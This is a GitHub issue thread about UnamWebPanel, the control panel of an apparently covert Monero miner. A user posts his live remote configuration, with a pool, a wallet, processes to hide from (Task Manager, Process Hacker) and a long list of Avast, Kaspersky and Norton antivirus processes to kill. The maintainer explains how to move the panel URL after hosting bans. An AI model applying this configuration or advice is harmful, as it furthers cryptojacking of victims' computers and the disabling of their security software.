### ISSUE TITLE
Can i change UnamWebPanel/api/endpoint.php url in Remote configration 

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/UnamWebPanel#291]
i want to Know someting 
i use remote config + web penal so some time i get banned from webhosting so can i have any posiblity for arranging remote config to change controll penal url any time ?

it's help to changing web penal url in futrue

**Comment by DARK-DEVIL-66** [comment]
it's my remote configred code


{
    "algo": "rx/0",
    "pool": "xmr.2miners.com",
    "port": 12222,
    "wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME}",
    "password": "x",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 50,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe",
    "stealth-fullscreen": false
}

**Comment by UnamSanctam** [comment]
Yes you can set it using the `"api-endpoint": "API Endpoint URL"` option inside the configuration.

**Comment by DARK-DEVIL-66** [comment]
can i block paticuler miner ? in web penal

**Comment by DARK-DEVIL-66** [comment]
like vmwear miners

**Comment by UnamSanctam** [comment]
Not really yet though you can remove them (until they mine again).
